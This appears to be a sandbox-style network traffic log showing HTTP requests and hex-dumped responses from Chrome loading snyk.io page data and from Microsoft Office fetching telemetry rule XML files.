                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::tvg8k-1729799353910-3e778ce33d68
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799353.1f6150e
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC3INData Raw: 7b 7d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: {}


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              122192.168.2.54988223.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC408OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/code-checker.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"p9a83itxh1kro"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/code-checker.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::8cr55-1729799354235-802af1278204
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799354.1095d4c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC15761INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 58 67 58 47 49 6c 79 49 4d 42 4c 78 42 70 76 36 4c 71 39 6f 45 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 30 38 54 31 36 3a 31 31 3a 31 37 2e 30 31 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 31 33 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6XgXGIlyIMBLxBpv6Lq9oE","type":"Entry","createdAt":"2022-12-08T16:11:17.016Z","updatedAt":"2023-06-13T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC8827INData Raw: 68 65 20 66 65 61 74 75 72 65 73 20 69 6e 63 6c 75 64 69 6e 67 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 20 61 6c 65 72 74 73 2c 20 72 65 61 6c 20 74 69 6d 65 20 73 63 61 6e 20 72 65 73 75 6c 74 73 2c 20 61 6e 64 20 61 63 74 69 6f 6e 61 62 6c 65 20 66 69 78 20 61 64 76 69 63 65 20 77 69 74 68 69 6e 20 79 6f 75 72 20 49 44 45 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 63 74 69 6f 6e 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79
                                                                                                                                                                                                                                                                                                              Data Ascii: he features including vulnerability alerts, real time scan results, and actionable fix advice within your IDE.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"actions":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"ty
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 22 2c 22 69 73 43 65 6e 74 65 72 65 64 22 3a 74 72 75 65 2c 22 68 65 61 64 6c 69 6e 65 54 79 70 65 22 3a 22 73 75 62 68 65 61 64 2d 73 6d 61 6c 6c 22 7d 7d 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 51 38 68 56 65 48 44 46 6a 73 39 36 33 49 74 41 41 6a 6a 6a 50 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 31 39 54 31 39 3a 32 33
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000","isCentered":true,"headlineType":"subhead-small"}}}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3Q8hVeHDFjs963ItAAjjjP","type":"Entry","createdAt":"2022-12-19T19:23
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC8204INData Raw: 6f 72 69 74 69 7a 65 20 63 6c 65 61 72 20 61 6e 64 20 75 70 2d 74 6f 2d 64 61 74 65 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 20 54 68 69 73 20 61 6c 6c 6f 77 73 20 74 65 73 74 20 65 6e 67 69 6e 65 65 72 73 20 74 6f 20 6d 6f 72 65 20 65 61 73 69 6c 79 20 75 6e 64 65 72 73 74 61 6e 64 20 74 68 65 20 70 75 72 70 6f 73 65 20 6f 66 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 63 6f 64 65 20 73 6e 69 70 70 65 74 2e 5c 6e 5c 6e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 6c 69 73 74 2d 69 74 65 6d 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22
                                                                                                                                                                                                                                                                                                              Data Ascii: oritize clear and up-to-date documentation. This allows test engineers to more easily understand the purpose of a particular code snippet.\n\n","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"list-item"},{"data":{},"content":[{"data":{},"content"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 72 6f 64 75 63 74 2f 73 6e 79 6b 2d 61 70 70 72 69 73 6b 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 6e 79 6b 2d 61 70 70 72 69 73 6b 22 7d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 32 76 42 33 4a 4c 39 64 58 44 71 58 4a 54 68 38 75 4a 46 4e 32 68 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000roduct/snyk-apprisk/","appearance":{"navItem":{"icon":"snyk-apprisk"}}}]}},{"sys":{"id":"2vB3JL9dXDqXJTh8uJFN2h","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenu
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC12INData Raw: 6f 6e 50 72 69 6d 61 72 79 4e 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: onPrimaryN
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC8111INData Raw: 30 30 30 30 31 46 41 33 0d 0a 61 76 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 69 63 69 6e 67 22 2c 22 75 72 6c 22 3a 22 2f 70 6c 61 6e 73 2f 22 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 7d 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 73 43 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00001FA3avItem","label":"Pricing","url":"/plans/","dropdownMenuCategories":{"items":[],"__typename":"NavigationPrimaryNavItemDropdownMenuCategoriesCollection"},"dropdownMenuColumns":{"items":[],"__typename":"NavigationPrimaryNavItemDropdownMenuColumnsCo
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              123192.168.2.54988613.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 0124f848-201e-003f-38ad-246d94000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194914Z-15b8d89586fvpb597drk06r8fc00000000e0000000006cqx
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              124192.168.2.54987423.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC457OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/lp/securing-ai-generated-code.json?slug=securing-ai-generated-code HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC582INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"2r7hvn8lfv5xb"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/lp/[slug].json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::sbmkd-1729799354365-fd7773696d75
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 7696
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799354.1095dac
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC7696INData Raw: 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 64 69 73 70 6c 61 79 4f 6e 53 65 63 75 72 69 74 79 52 65 73 6f 75 72 63 65 73 50 61 67 65 22 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 74 6f 70 69 63 41 69 22 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 74 6f 70 69 63 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 63 75 72 69 74 79 22 7d 7d 2c 7b 22 73 79 73
                                                                                                                                                                                                                                                                                                              Data Ascii: {"pageProps":{"page":{"metadata":{"tags":[{"sys":{"type":"Link","linkType":"Tag","id":"displayOnSecurityResourcesPage"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicAi"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicApplicationSecurity"}},{"sys


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              125192.168.2.54988913.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 26284338-e01e-0052-664d-22d9df000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194914Z-16849878b787sbpl0sv29sm89s000000086g00000000p0nk
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              126192.168.2.54988723.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC412OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/resource-library.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC612INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"5ye7nohzf7akkd"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/resource-library
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: MISS
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::8cr55-1729799354480-9a3ead5a4d82
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:14 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799354.1095e2f
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15772INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 74 6f 70 69 63 41 69 22 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 74 6f 70 69 63 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 63 75 72 69 74 79 22 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 74 6f 70 69 63 43 6f 64 65 53 65 63 75 72 69 74 79 22 7d 7d 2c 7b 22 73 79 73 22 3a 7b
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[{"sys":{"type":"Link","linkType":"Tag","id":"topicAi"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicApplicationSecurity"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicCodeSecurity"}},{"sys":{
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC8816INData Raw: 73 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 72 69 73 6b 20 61 73 20 41 49 20 63 6f 64 69 6e 67 20 74 6f 6f 6c 73 20 73 70 65 65 64 20 75 70 20 76 65 6c 6f 63 69 74 79 20 61 6e 64 20 73 75 67 67 65 73 74 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 6d 6f 64 75 6c 65 73 2c 20 62 75 74 20 74 65 61 6d 73 20 61 72 65 20 6e 6f 74 20 70 72 6f 67 72 61 6d 6d 61 74 69 63 61 6c 6c 79 20 76 61 6c 69 64 61 74 69 6e 67 20 74 68 61 74 20 73 75 67 67 65 73 74 65 64 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 63 6f 6d 70 6f 6e 65 6e 74 73 20 61 72 65 20 73 65 63 75 72 65 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c
